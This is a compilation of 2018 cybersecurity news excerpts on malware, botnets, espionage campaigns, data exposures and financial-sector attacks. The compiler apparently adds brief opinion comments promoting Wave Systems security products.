Using breached passwords puts your network at risk. Password policies often do not prevent employees using known bad passwords. Making your users frequently change their passwords isn’t a good solution either. It only takes one compromised password match for the bad guys to gain access.
KnowBe4’s complimentary NEW Breached Password Test (BPT) checks to see if your users are currently using passwords that are in publicly available breaches associated with your domain. BPT checks against your Active Directory and reports compromised passwords in use right now so that you can take action immediately!
Here’s how Breached Password Test works:
checkmark Checks to see if your company domains have been part of a data breach that included passwords
checkmark Checks to see if any of those breached passwords are currently in use in your Active Directory
checkmark Does not show/report on the actual passwords of accounts
checkmark Just download the install and run it
checkmark Results in a few minutes!
Meet MyloBot malware turning Windows devices into Botnet
For a strong possible solution to this see:
https://www.wavesys.com/malware-protection
Good quote at the link, 'Among other things, you'll know immediately whether any one of your devices - computers, laptops, tablets, smartphones- has been tampered with.'
https://www.hackread.com/meet-mylobot-malware-turning-windows-devices-into-botnet/
The IT security researchers at deep learning cybersecurity firm Deep Instinct have discovered a sophisticated malware in the wild targeting Microsoft’s Windows-based computers.
Adding devices to Botnet
The malware works in such a way that upon infecting, it allows hackers to take over the device and make it part of a botnet to carry out different malicious activities including conducting Distributed Denial of Service (DDoS) attacks, spreading malware or infecting the system with ransomware etc.
A Botnet is a network of private computers infected with malicious software and controlled as a group without the owners’ knowledge, e.g., to send spam messages.
Apart from these, the malware not only steals user data, it also disables the anti-virus program and removes other malware installed on the system. Dubbed MyloBot by Deep Instinct; based on its capabilities and sophistication, researchers believe that they have “never seen” such a malware before.
Furthermore, once installed, MyloBot starts disabling key features on the system including Windows Updates, Windows Defender, blocking ports in Windows Firewall, deleting applications and other malware on the system.
See: 13 Ways Cyber Criminals Spread Malware/Trojan
“This can result in loss of the tremendous amount of data, the need to shut down computers for recovery purposes, which can lead to disasters in enterprises. The fact that the botnet behaves as a gate for additional payloads, puts the enterprise in risk for the leak of sensitive data as well, following the risk of keyloggers/banking trojans installations,” researchers warned.
Dark Web connection
Further digging of MyloBot sample reveals that the campaign is being operated from the dark web while its command and control (C&C) system is also part of other malicious campaigns.
Although it is unclear how MyloBot is being spread, researchers discovered the malware on one of their clients’ system sitting idle for 14 days which is one of its delaying mechanisms before accessing its command and control servers.
It is not surprising that Windows users are being targeted with MyloBot. Last week, another malware called Zacinlo was caught infecting Windows 10, Windows 7 and Windows 8 PCs. Therefore, if you are a Windows user watch out for both threats, keep your system updated, run a full anti-virus scan, refrain from visiting malicious sites and do not download files from unknown emails.
Deep Instinct is yet to publish research paper covering Mylobot from end to end.
FIs Facing $100B A Year In Cyberattack Losses
How about using excellent cybersecurity tools to all but nullify the risk of attack? wavesys.com....
https://www.pymnts.com/news/security-and-risk/2018/imf-financial-institutions-cyberattack-losses/
The impact from a cyberattack on financial institutions (FIs) could reach as high as a few hundred billion dollars annually, chipping away at profits and threatening the stability of financial firms, the International Monetary Fund (IMF) warned in a new report.
According to an IMF staff modeling exercise, the IMF found that FIs could lose that much each year because they are a target of hackers, and due to the role they plan in managing and handling funds. The IMF report said a successful hack of an FI could spread quickly through the interconnected financial system. What’s more, the IMF said that lots of FIs use older systems that may not be able to fight off a cyberattack. That attack could result in financial losses, as well as a hit to the FIs’ reputation, which could lead to more losses.
To ascertain the risk, the IMF used techniques from actuarial science and operational risk measurement to come up with total losses from cyberattacks. Taken “at face value,” the IMF said the study suggests the average annual potential losses from cyberattacks could be nearly 9 percent of banks’ net income globally, or around $100 billion. In a severe scenario where cyberattacks are frequent, the hit would be two-and-half to three-and-a-half times as high, or between $270 billion and $350 billion. In the worst 5 percent of cases, the average potential loss could be as high as half of a bank’s net income, which would place the entire financial sector at risk.
In addition, the IMF noted that the estimated losses are much bigger than the cyber insurance market, with premiums remaining small globally at around $3 billion as of last year, and most FIs not carrying cyber insurance. When they do, they get limited coverage with insurers, having a tough time evaluating the risk of cyberattack exposure, noted the IMF. The IMF said there is a way to improve the risks, pointing to governments collecting more “granular, consistent and complete data on the frequency and impact of cyberattacks.” The IMF said that would help assess risk for the financial sector.
The IMF wrote in the report, “Requirements to report breaches — such as considered under the EU’s General Data Protection Regulation [GDPR] — should improve knowledge of cyberattacks. Scenario analysis could be used to develop a comprehensive assessment of how cyberattacks could spread and design adequate responses by private institutions and governments.”
New fears over Chinese espionage grip Washington
http://thehill.com/policy/cybersecurity/393741-new-fears-over-chinese-espionage-grip-washington
=============================================================
Red-teaming by DHS 'quietly and slowly' uncovers agency vulnerabilities
The testing scenario in the second article would be stopped with Wave's products as explained on the website (partially under The Wave alternative). imo.
https://www.cyberscoop.com/red-teaming-dhs-quietly-slowly-uncovers-agency-vulnerabilities/?utm_campaign=CyberScoop%20-%20Editorial&utm_content=73447112&utm_medium=social&utm_source=twitter
The Department of Homeland Security has carried out quiet “red-teaming” exercises at three federal agencies, breaking into networks and telling agency officials how it was done. The goal is for officials to more quickly realize when a hacker has a foothold in their systems to keep them from exfiltrating data.
“We go really quietly and slowly, just like an adversary would,” Rob Karas, the DHS official leading the red-team exercises, said Wednesday at the Cybersecurity Leadership Forum presented by Forcepoint and produced by CyberScoop and FedScoop.
Karas said his team has carried out five such red-team drills at three agencies, declining to name them. The 90-day assessments begin with about two weeks of reconnaissance that might culminate in a carefully crafted spearphishing email.
“We send a phishing email and it beacons back to our host in Arlington, and then we have a foothold” into the organization, said Karas, DHS’s director of national cybersecurity assessments and technical services. “From there, we pivot to other computers, to domain controllers, to enterprise computers.”
His team of security testers litters the target network with signatures representing ransomware or other malware — no actual malicious code is used. They check to see if the agency’s security operations center (SOC) detects malicious scans of the network and how it responds. The ethical hackers also attempt to exfiltrate large volumes of data over various channels.
Cybersecurity experts say rigorous red-team exercises are key to giving an organization a clear understanding of its vulnerabilities. A recent Office of Management and Budget report suggests many agencies still lack that clear understanding. Just 27 percent of agencies say they can detect and investigate “attempts to access large volumes of data,” and even fewer agencies test that capability annually, according to the report.
One of the more infamous cases of an undetected data heist at an agency was the 2015 hack of the Office of Personnel Management. Hackers sat unnoticed on the agency’s network for months and made off with the personal data of 22 million current and former federal workers.
Karas is trying to keep that from happening again.
At the end of a red-team assessment, Karas’s team sits down with officials from the target agency to deliver their security verdict. It might take three or four days for an agency to notice Karas’s testers had created or deleted accounts on the network, he said. “Other things might take them weeks — or they might not notice at all.”
After the initial assessment, the plan is to do another test in six months or a year’s time, he said.
Ransomhack; a new attack blackmailing business owners using GDPR
Wave has three products which can help protect against these ransomhacks: Wave VSC 2.0, Wave Endpoint Monitor, and Wave SED Management. They are a unique and excellent set of products that could help prevent a ransom fee and a GDPR fine (which can be hefty). imo. To keep these ransom hackers off the network there is also known devices (TPMs) which can keep these bad guys (unknown devices) from obtaining sensitive data from the network.
https://www.hackread.com/ransomhack-gdpr-attack-blackmailing-business-owners/
Hackers are threatening companies to leak stolen user data online to hurt them through GDPR regulations – In return they are demanding ransom money.
On 25 May 2018, the new European General Data Protection Regulation (GDPR) which aims to improve information security on a global scale came into force. At the same time, this provoked the emergence of a new method for blackmailing the market.
Business owners are reporting that they are being a subject to cyber attacks related to ransomware where personal data that belongs to users or customers is exposed and the ransom demand is made in return for its retrieval.
Experts from Bulgaria based TAD GROUP point out the difference in the ransom methodology. This time cybercriminals aim to disclose private information to the public eye rather than encrypt it so it is unobtainable unless paid for.
Hackers threaten to publish the entire content of the database, containing personal data records, on a public server, that according to the regulation, means that the company will be severely fined.
This is the warning that Ivan Todorov, the founder of TAD GROUP, is issuing. According to him, the victims are medium and large-scale Bulgarian companies which are requested to pay a ransom in an untraceable cryptocurrency.
The ransoms vary from $ 1,000 to $ 20,000, while the fines for companies that the new EU regulation envisions account for 4% of the global annual turnover for the previous year or up to 20 million euros. In short, Ivan Todorov calls this type of hacker attacks “ransomhack“.
According to TAD GROUP, from credible sources, it has become clear that the attacked companies have taken in GDPR protection measures by creating policies for personal data storage and security in their offices but have not conducted information security tests to verify whether they are actually susceptible to virtual attacks from cybercriminals.
In other words, they did what is necessary to achieve compliance with the requirements of the Commission for Personal Data Protection. However, most companies did not consider securing their Internet-facing infrastructure.
The opinion of companies offering cybersecurity solutions (such as TAD GROUP) is that the only way to ensure a higher grade of security against cyber attacks is to undertake tests for information security – otherwise known as penetration tests.
The tests are a simulation of targeted cyber attacks, except that they are not done with criminal intentions but deliberately with the exclusive permission from clients and in accordance with their specific needs. The goal is to use methods and techniques utilized by malicious third-parties in order to detect and patch security vulnerabilities. This is done with a signed contract and confidentiality agreement.
After performing the service, the results are documented in a penetration test report that is stored in the client’s profile where it can be viewed and downloaded. It can also be deleted from the TAD GROUP’s system if requested from the client.
“The cybersecurity as a whole is ever changing – if a system is not prone to successful attacks today, this does not necessarily mean that it will not be vulnerable in a month’s time. New vulnerabilities and exploits that lead to information leaks are emerging every day. This is why the more often these tests are performed, the more secure companies can feel”, explains Ivan Todorov and recommends that penetration tests are undertaken at least twice a year.
As the disruption in cybersecurity is often a consequence of human error, companies would benefit from the so-called social engineering tests. They are a set of tests carried out against employees operating from within the company’s headquarters and offices – usually via phone or e-mail, without employee’s knowledge. A wide variety of techniques are applied in order to force employees to disclose sensitive or confidential business information to affiliates who should not have access to it otherwise.
Companies that have already become a victim of a cybercrime have the obligation to inform the regulatory authority within 72 hours of confirming the data breach. For Bulgaria, the regulatory authority is the Commission for Personal Data Protection, which has to assess what sanctions to impose after a data breach occurs. However, if a company does not inform the regulator in time, sanctions will surely be imposed and their severity will differ for the worse.
Note: These are the findings of TAD GROUP, to contact the company for more information on the issue visit their official website.
Software Attacks on Hardware Wallets
If EXO5 is still owned by Wave, it could have positive implications for Wave given that the typical phone can be hacked when a hacker is in possession of the phone as summarized in the Black Hat presentation. EXO5 could possibly kill the phone before the hacker has a chance to hack it or find it. Could a hacker have a more difficult time with the Boeing phone which has a TPM? Could there be a Samsung TPM in a phone in the future? Samsung/Wave agreement was a 15 year agreement.
https://www.blackhat.com/us-18/briefings/schedule/index.html#software-attacks-on-hardware-wallets-10665
Almost all security research has a question often left unanswered: what would be the financial consequence, if a discovered vulnerability is maliciously exploited? The security community almost never knows, unless a real attack takes place and the damage becomes known to the public. Development of the cryptocurrencies made it even more difficult to control the impact of an attack since all the security relies on a single wallet's private key which needs to stay secure. Multiple breaches of private wallets and public currency exchange services are well-known, and to address the issue a few companies have come up with secure hardware storage devices to preserve the wallet's secrets at all costs.
But, how secure are they? In this research, we show how software attacks can be used to break in the most protected part of the hardware wallet, the Secure Element, and how it can be exploited by an attacker. The number of identified vulnerabilities in the hardware wallet show how software vulnerabilities in the TEE operating system can lead to a compromise of the memory isolation and a reveal of secrets of the OS and other user applications. Finally, based on the identified vulnerabilities an attack is proposed which allows anyone with only physical access to the hardware wallet to retrieve secret keys and data from the device. Additionally, a supply chain attack on a device allowing an attacker to bypass security features of the device and have full control of the installed wallets on the device.
3,000+ mobile apps leaking data from unsecured Firebase databases
Another reason companies and governments should be happy to use Wave VSC 2.0.
https://www.helpnetsecurity.com/2018/06/20/unsecured-firebase-databases/
Appthority published research on its discovery of a new HospitalGown threat variant that occurs when app developers fail to require authentication to Google Firebase databases.
Appthority security researchers discovered the HospitalGown vulnerability in 2017 which leads to data exposures, not due to any code in the app, but to the app developers’ failure to properly secure backend data stores (hence the name). The new Firebase variant exposes large amounts of mobile app-related data stored in unsecured Firebase databases.
Exposed data from includes personally identifiable information (PII), private health information (PHI), plaintext passwords, social media account and cryptocurrency exchange private access tokens, financial transactions, vehicle license plate and registration numbers, and more data leaking from vulnerable apps.
“The Firebase vulnerability is a significant and critical mobile vulnerability exposing vast amounts of sensitive data,” said Seth Hardy, Appthority Director of Security Research. “The large number of vulnerable apps and the wide variety of data shows that enterprises can’t rely on mobile app developers, app store vetting or simple malware scans to address data security. To keep their data safe and stay in compliance with regulations like GDPR, HIPAA and PCI, they need to be investing in deep app analysis that detects these types of vulnerabilities.”
Key findings
•3,000 mobile iOS and Android apps – over 620 million Android downloads, alone — are leaking data from 2,300 unsecured Firebase databases
•Multiple app categories are impacted including tools, productivity, health and fitness, communication, cryptocurrency, finance and business apps
•Most enterprises are impacted: 62% of enterprises have at least one vulnerable app in their mobile environment.
More than 100 million records are exposed, including:
•2.6 million plain text passwords and user IDs
•4 million+ PHI (Protected Health Information) records (chat messages and prescription details)
•25 million GPS location records
•50,000 financial records including banking, payment and Bitcoin transactions
•4.5 million+ Facebook, LinkedIn, Firebase, and corporate data store user tokens.
Over half of Americans would stop using an app if their messages could be read by others
It appears that the market could be ready for Wave's Scrambls!
https://www.zdnet.com/article/over-half-of-americans-would-stop-using-an-app-if-their-messages-could-be-read-by-others/
Social media platforms must evolve to higher privacy standards -- to stop their users leaving for more secure channels.
Our social sharing behaviour drives us to tend to trust that whatever we say on social media is for our own eyes. But the furor over Cambridge Analytica's access to our data has shown consumers are not happy at all that our data is being used for gain.
Platforms such as Twitter and Facebook are not only watching what we post, but Facebook is also listening to our verbal conversations to deliver more targeted ads to us.
Our attitudes are changing. Social consumers now demand better security across their social media sites -- and they're forcing the social platforms to listen to them.
The social media giants are listening. Twitter is testing an encrypted messaging feature, Yahoo is testing an invite-only group messaging app called Squirrel, and Facebook has introduced its 'Clear History' privacy control to reassure users that their data is secure and private.
Secure messaging app platform Viber has released an online survey showing what US consumers think about their personal information being shared online.
It polled a representative sample of 1,500 US online consumers in March 2018 and asked them about privacy, security, and data sharing.
Consumers do not check their privacy settings, but expect their messages to be secure.
Almost a third of respondents (32.5 percent) only check their privacy settings once every six months, yet 63.2 percent of men and 67.1 percent of women expect that the person they are messaging is the only one allowed to see that message.
If social posts or chat messages were shared publicly, 38.9 percent of male respondents (45.6 percent female) said they were concerned about identity theft.
Another 4.4 percent were worried that they could lose their jobs (3.8 percent female), and 3.3 percent thought that their significant other might leave them (1.6 percent female).
Customers have no tolerance for data shared to advertisers, or political managers. Over half of consumers (55 percent) would stop using a messaging app, and one in three (33.3 percent) would be most upset if their contact details were shared.
Consumers want strong end-to-end encryption across their chosen platforms. Currently, the efforts made by Twitter and Facebook do not quite reach the huge expectations of users. Consumers want secure social apps with encryption that advertisers can not access.
Future social apps must be developed with encryption in mind -- encrypted channels reassure users that they can have more open conversations with their connections.
With the app upgrades coming from platforms like Facebook and Twitter, will it be enough to reassure consumers that their data really is secure?
'Hidden Tunnels' Help Hackers Launch Financial Services Attacks
If Financial Services companies knew about the greatness lurking in Wave VSC 2.0 and other Wave products the problems in these articles wouldn't be occurring as they are. Known devices could go a long way in keeping the bad guys off the network. Unknown devices could be kicked off the network and keep the attackers from tunneling. imo.
https://www.darkreading.com/hidden-tunnels-help-hackers-launch-financial-services-attacks/d/d-id/1332109
Hackers are using the infrastructure, meant to transmit data between applications, for command and control.
The security tools and strategies financial services organizations use to protect their data could be leveraged by cybercriminals who sneak in undetected via "hidden tunnels" to conceal their theft, according to a new report published by Vectra.
Ironically, financial firms have the biggest non-government security budgets in the world, Vectra says. Bank of America invests more than $600 million in cybersecurity each year, while JPMorgan Chase spends $500 million. Equifax, while smaller than both, spends an annual $85 million on security.
Yet, in Equifax's case – despite budget, staff, and a security operations center – in 2017 it took 78 days for it to detect a massive breach of its network, in which attackers accessed 145.5 million Social Security numbers, 17.6 million driver's license numbers, 20.3 million phone numbers, and 1.8 million email addresses.
The question of how attackers were able to exfiltrate so much data, and whether the same thing could happen at another financial firm, prompted Vectra researchers to take a closer look at exactly what happened.
A Review of the Equifacts
Equifax's breach started when a Web server was exploited to access the corporate network. The attackers avoided using tools that would alert the company's security team, instead building command-and-control (C&C) tunnels into Equifax. They installed more than 30 Web shells with different addresses to burrow into Equifax and, once inside the network, customized their hacking tools to exploit Equifax software, evade firewalls, and exfiltrate information.
For six months following the Equifax breach, Vectra researchers combed metadata from 246 opt-in customers and more than 4.5 million devices to learn more about attacker behaviors and network trends. They found the same activity that led to the Equifax breach is prevalent throughout the financial services industry.
What stood out most is the use of hidden tunnels in HTTP, HTTPS, and DNS traffic, which threat actors use to get into networks protected with strong access controls. These tunnels have been used for about three to four years, says Chris Morales, head of security analytics at Vectra, where researchers had been looking into this tactic long before Equifax was hit.
"Attackers don't use hidden tunnels unless they have to," he explains. When enterprise security defenses are strong, threat actors have to seek new ways to break through them.
Tunneling Into Financial Services
Financial firms have stronger security than most, securing Web applications with layers upon layers of access controls. Because apps are locked down, data has to be sent through "hidden tunnels" to move across an organization. There are legitimate use cases for this: Specific stock-tickers commercial apps and internal financial services use tunnels to communicate.
The high volume of traffic flowing to and from enterprise Web applications creates an ideal place for attackers to hide, Morales says. Hidden tunnels are tough to detect because communications are hidden within connections that use normal, permitted protocols. Messages can be embedded as text in headers, cookies, and other fields, researchers say.
Morales breaks down how an attack might work: A threat actor might start with an entry point as simple as a phishing campaign. With a foothold in the organization, the attactor can use reconnaissance techniques to learn the network – the number of devices and how he can make his footprint more durable and infect more machines.
"As he does all those things, he'll need to find ways to look like normal traffic," Morales explains. "Maybe he'll find a network scanning machine and perform recon from there because it'll look more normal." Once a tunnel is established, the hacker passes data in small chunks so it isn't picked up by anomaly detection systems.
Attackers could leverage tools purchased on the Dark Web to exfiltrate data and bypass access controls. "The tools are out there, and attackers have a great ecosystem for sharing them," says Mike Banic, vice president of marketing at Vectra. "In some cases, their ecosystem could be better than the defenders."
Compared with the industry average, there are fewer C&C behaviors in financial services, and HTTP C&C communications are lower overall, the report states. However, there are significantly more tunnels per 10,000 devices in financial services than all other industries combined.
=========================================================
Attackers Spy and Steal from Financial Firms
https://www.infosecurity-magazine.com/news/attackers-spy-and-steal-from/?utm_source=dlvr.it&utm_medium=twitter
In an attempt to steal sensitive data, cyber-criminals have been targeting financial firms by building hidden tunnels in order to break into networks. According to a report released today by Vectra, these attack behaviors are the same as those that led to the 2017 Equifax breach.
According to a new report, 2018 Spotlight Report on Financial Services, attackers are able to gain remote access through the use of command-and-control (C&C). In the data analyzed, attackers had established nearly 30 web shells accessible from approximately 35 different public IP addresses, which allowed them to exfiltrate data while going undetected.
Attackers often leverage hidden tunnels to infiltrate networks with strong access controls because legitimate applications also use hidden tunnels to bypass security controls that can sometimes compromise full functionality. That's why it's a successful attack method.
"Every industry has a profile of network and user behaviors that relate to specific business models, applications and users," said Chris Morales, head of security analytics at Vectra. "Attackers will mimic and blend in with these behaviors, making them difficult to expose."
In this latest discovery, Vectra detected more hidden C&C tunnels and more than twice as many hidden data-exfiltration tunnels per 10,000 devices in financial services than all other industries combined.
To evade firewalls, attackers use special tunneling tools to move laterally, stockpiling data from database after database as they go. They were able to amass so much data that it then needed to be divided into smaller stockpiles so that no alarm bells went off during exfiltration.
"All this points to one painful fact: The largest enterprise organizations in the world remain lucrative targets for sophisticated cyber-attackers. Security breaches across multiple industries forge ahead in an upward trajectory, and the financial services industry is no exception," the report said.
Chinese Hackers Target Satellite, Geospatial Imaging, Defense Companies
Wave could have eliminated these attacks with known devices (or the use of TPMs throughout the defense companies' fleet) and Wave Endpoint Monitor could have helped stop the APT. imo. The attackers would have had a difficult time blending in with the network being an unknown device. Wave's products would have fared much better than whoever was responsible for stopping the hacks in the first place. imo. Wave Endpoint Monitor could do a better job overall of detecting custom made malware than a blacklisting anti virus product like Symantec. imo.
https://www.bleepingcomputer.com/news/security/chinese-hackers-target-satellite-geospatial-imaging-defense-companies/
A cyber-espionage group believed to be operating out of China hacked companies who develop satellite communications, geospatial imaging, and defense contractors from both United States and Southeast Asia.
The hacks were detected by US cyber-security firm Symantec, who said today in a report that intruders showed particular interest in the operational side of the breached companies.
Hackers tried to reach and paid close attention to infecting computer systems used for controlling communications satellites or those working with geospatial data collected by world-mapping satellites.
"This suggests to us that [the group]’s motives go beyond spying and may also include disruption," Symantec said. There are fears that hackers might be able or even attempt to sabotage satellites or poison geospatial data.
Thrip APT behind the hacks
The company said that responsible for the attacks was an advanced persistent threat (APT, a term used to describe cyber-espionage groups) known under the codename of Thrip.
Symantec says it's been tracking this group since 2013, and it has historically believed the group to be operating out of China.
The recent attacks were difficult to detect, the company said. Hackers used a technique known as "living off the land," which consists of using local tools already available on the operating system to carry out malicious operations.
"The purpose of living off the land is twofold," Symantec explained. "By using such features and tools, attackers are hoping to blend in on the victim’s network and hide their activity in a sea of legitimate processes. Secondly, even if malicious activity involving these tools is detected, it can make it harder to attribute attacks."
According to Symantec, hackers used the following locally-installed and completely legitimate tools...
PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool was primarily used by the attackers to move laterally on the victim’s network.
PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance.
Mimikatz: Freely available tool capable of changing privileges, exporting security certificates, and recovering Windows passwords in plaintext.
WinSCP: Open source FTP client used to exfiltrate data from targeted organizations.
LogMeIn: Cloud-based remote access software. It’s unclear whether the attackers gained unauthorized access to the victim’s LogMeIn accounts or whether they created their own.
...to install custom-made malware such as:
Trojan.Rikamanu: A custom Trojan designed to steal information from an infected computer, including credentials and system information.
Infostealer.Catchamas: Based on Rikamanu, this malware contains additional features designed to avoid detection. It also includes a number of new capabilities, such as the ability to capture information from newer applications (such as new or updated web browsers) that have emerged since the original Trojan.Rikamanu malware was created.
Trojan.Mycicil: A keylogger known to be created by underground Chinese hackers. Although publicly available, it is not frequently seen.
Backdoor.Spedear: Although not seen in this recent wave of attacks, Spedear is a backdoor Trojan that has been used by Thrip in other campaigns.
Trojan.Syndicasec: Another Trojan used by Thrip in previous campaigns.
Hacks detected as back as January 2018
Symantec says it detected these attacks only after one of its artificial intelligence and machine learning-based triggered an alert for a suspicious use of a legitimate tool.
Experts say they've used this initial alert to uncover initial signs of compromise and then pulled on a thread to uncover a broader operation targeting multiple companies across multiple countries and industry sectors. The purpose of this hacking campaign was obvious cyber-espionage.
The company says it uncovered this operation in January, but the Thrip hacking campaign could be broader than the company has currently reported.